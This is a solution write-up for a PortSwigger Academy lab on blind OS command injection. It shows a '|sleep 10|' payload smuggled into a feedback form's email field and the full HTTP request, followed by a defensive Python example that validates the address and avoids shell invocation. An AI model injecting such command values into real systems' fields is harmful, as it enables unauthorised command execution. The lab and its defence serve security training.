PortSwigger Blind OS command injection with time

Blind OS command injection with time delays

Solution

Open the website: https://0aa60066030e14278284d30b004b0016.web-security-academy.net/feedback

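Inject the payload into the email parameter of the feedback form and submit it. The response comes back after a 10-second wait.

Payload: |sleep%2010|
Payload in the email field: [email protected]|sleep%2010|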
---
POST /feedback/submit HTTP/2
Host: 0aa60066030e14278284d30b004b0016.web-security-academy.net
Cookie: session=zn4w45SHDlJbZepcwNT7LT8QHAf5eWSi
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Origin: https://0aa60066030e14278284d30b004b0016.web-security-academy.net
Referer: https://0aa60066030e14278284d30b004b0016.web-security-academy.net/feedback
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

csrf=6V5wwa8JckTGuFAgqLJm0UZWxFIkXFFV&name=Jan&[email protected]|sleep%2010|&subject=Temat&message=aaa

Solved
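
The defensive counterpart to the request above, as an added example that is not part of the original write-up or the lab's code: the email field is checked against a strict allowlist, and any external helper is invoked with an argument list instead of a shell string. It assumes the backend hands the address to an external program; the function names, the helper command and the sample address are hypothetical.

```python
import re
import subprocess
import sys
from urllib.parse import parse_qs

# Constructed body modelled on the request above; token and address are placeholders.
SAMPLE_BODY = "csrf=TOKEN&name=Jan&email=user@example.test|sleep%2010|&subject=Temat&message=aaa"

# Conservative allowlist: no whitespace, quotes or shell metacharacters.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,253}\.[A-Za-z]{2,63}")
SHELL_META = set("|&;`$()<>\n\r\\\"'")


def parse_feedback(body):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def suspicious_fields(fields):
    """Names of fields containing shell metacharacters, for logging and alerting."""
    return sorted(k for k, v in fields.items() if SHELL_META & set(v))


def is_valid_email(value):
    return EMAIL_RE.fullmatch(value) is not None


def run_helper(email):
    """Hypothetical helper call: argv list and no shell, so the value stays
    one literal argument and is never parsed as a command line."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", email],
        capture_output=True, text=True, timeout=5, check=True,
    )
    return proc.stdout


def handle_feedback(body):
    """Reject invalid addresses before anything reaches an external program."""
    fields = parse_feedback(body)
    email = fields.get("email", "")
    if not is_valid_email(email):
        return {"status": 400, "flagged": suspicious_fields(fields)}
    return {"status": 200, "helper_saw": run_helper(email)}
```

Validation and shell-free invocation are independent layers: even if a value with metacharacters got past the allowlist, `run_helper` would pass it through as plain text.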